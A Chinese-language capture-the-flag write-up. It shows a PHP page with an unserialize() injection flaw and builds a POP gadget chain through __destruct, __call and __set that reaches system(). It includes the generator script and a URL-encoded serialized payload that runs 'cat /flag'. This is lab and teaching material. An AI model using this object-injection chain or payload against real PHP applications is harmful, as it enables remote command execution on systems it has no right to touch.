进入首页代码如下:
<?php
highlight_file(__file__);
Class Rd{
public $ending;
public $cl;
public $poc;
public function __destruct()
{
echo "All matters have concluded";
die($this->ending);
}
public function __call($name, $arg)
{
foreach ($arg as $key =>$value)
{
if($arg[0]['POC']=="1111")
{
echo "1";
$this->cl->var1 = "system";
}
}
}
}
class Poc{
public $payload;
public $fun;
public function __set($name, $value)
{
$this->payload = $name;
$this->fun = $value;
}
function getflag($paylaod)
{
echo "Have you genuinely accomplished what you set out to do?";
file_get_contents($paylaod);
}
}
class Er{
public $symbol;
public $Flag;
public function __construct()
{
$this->symbol = True;
}
public function __set($name, $value)
{
$value($this->Flag);
}
}
class Ha{
public $start;
public $start1;
public $start2;
public function __construct()
{
echo $this->start1."__construct"."</br>";
}
public function __destruct()
{
if($this->start2==="11111") {
$this->start1->Love($this->start);
echo "You are Good!";
}
}
}
if(isset($_GET['Ha_rde_r']))
{
unserialize($_GET['Ha_rde_r']);
} else{
die("You are Silly goose!");
}
?>
通过审计代码,大概构造出pop链如下:
Ha __destr-> Rd __call -> Er __set
构造字符串:
<?php
Class Rd{
public $ending;
public $cl;
public $poc;
}
class Er{
public $symbol;
public $Flag;
}
class Ha{
public $start;
public $start1;
public $start2 = "11111";
}
$Ha_start_dic = array(
"POC" => "1111"
);
$Ha_start = array($Ha_start_dic);
$Ha_start1 = new Rd();
$Ha_start1_cl = new Er();
$Ha_start1_cl->Flag = "cat /flag";
$ha = new Ha();
$ha->start = $Ha_start_dic;
$ha->start1 = $Ha_start1;
$Ha_start1->cl = $Ha_start1_cl;
echo urlencode(serialize($ha));
?>
传参请求,拿到flag。
?Ha_rde_r=O%3A2%3A%22Ha%22%3A3%3A%7Bs%3A5%3A%22start%22%3Ba%3A1%3A%7Bs%3A3%3A%22POC%22%3Bs%3A4%3A%221111%22%3B%7Ds%3A6%3A%22start1%22%3BO%3A2%3A%22Rd%22%3A3%3A%7Bs%3A6%3A%22ending%22%3BN%3Bs%3A2%3A%22cl%22%3BO%3A2%3A%22Er%22%3A2%3A%7Bs%3A6%3A%22symbol%22%3BN%3Bs%3A4%3A%22Flag%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A3%3A%22poc%22%3BN%3B%7Ds%3A6%3A%22start2%22%3Bs%3A5%3A%2211111%22%3B%7D